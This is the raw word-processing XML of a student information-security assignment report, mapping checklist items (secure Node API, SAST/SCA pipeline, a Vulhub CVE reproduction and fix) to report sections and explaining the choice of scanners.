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200" w:after="80" w:line="288" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="25"/>
        </w:rPr>
        <w:t>1.1 Where each requirement is answered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The assignment is a checklist, so this table maps every item to the place where it is answered — in this report, in the repository, or both.</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4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Requirement (manual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Where it is answered</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>1. Stack, project, git repository linked to a remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1; repository URL in §2.1 and in the README</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2. Functional API — POST /auth/login, GET /api/data, one endpoint of your own</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.2 (three required plus two extra), tested by 14 automated checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>2. Data storage (SQLite or similar)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1 — SQLite through the built-in node:sqlite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. SQLi protection — prepared statements, no concatenation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.1 with the statement from src/db.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. XSS protection — escape all user data returned in responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.2 with the encoder from src/security.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>3. Broken authentication — JWT issuance, verification middleware, bcrypt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§3.3, covering issuing, verification, hashing, timing and lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>4. CI/CD file in .github/workflows, SAST and SCA on every push</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§4 with the workflow file and the stage table</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>5. Test the API with curl; screenshots of SAST/SCA results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.2 (curl examples) and §4, Fig. 1 and Fig. 2 taken from the Actions section</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>6–7. Vulnerable environment from Vulhub, Docker, service started</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.3 — docker compose build/up, verified inside the container</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>8. Reproduce the attack, record every command and request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.3, plus evidence/ transcripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>9. Root cause analysis in your own words</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.4 — the normalize() logic error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>10. Fix, rebuild, verify the attack no longer works, regression test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§5.5 (fix) and §5.6 (verification and regression)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 1 — public repository link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 2 — README text with all eight items</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Appendix A reproduces README.md verbatim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 3 — link to the last successful pipeline run</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>§2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Submission 4 — folder with the changed files</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>fixes/ (Dockerfiles, compose file, notes) and cve/CVE-2017-14849/Dockerfile.fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4762"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Title page — work number and title, variant, name, HDU number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4082"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Title page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Deliverables. The project is published as a public repository; the pipeline runs on every push and the latest successful run is linked below:</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494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Deliverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Repository</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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2494"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="271" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Last successful pipeline run</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https://github.com/killer-4087-2/22320110-HDU-CS4-26-27-1-Information-Security/actions/runs/40445700675</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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120" w:after="160" w:line="322" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>**On the choice of scanners.** The manual suggests `npm audit` or `snyk test` for JavaScript under SAST, and OWASP Dependency-Check or Snyk under SCA. The split is slightly unusual, because `npm audit` is a composition analysis tool: it compares the installed dependency tree against advisory data and never reads the project's own code. This repository therefore uses **ESLint with eslint-plugin-security for SAST** — it inspects our source, which is what static analysis means — and **npm audit for SCA**, which queries the npm advisory database, the same corpus that Dependency-Check consults for JavaScript packages. Both are free, need no account or API key, and run in the pipeline on every push, which satisfies the grading criterion of at least one SAST/SCA tool running in CI.</w:t>
      </w:r>
    </w:p>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keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3908066"/>
            <wp:docPr id="1" name="Picture 1"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-1-sast-sca.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>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1  The three pipeline stages executed locally: 14/14 tests pass, SAST reports 0 errors and 1 warning, SCA reports 0 vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5544000" cy="3960000"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="shot-0-actions.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5544000" cy="3960000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
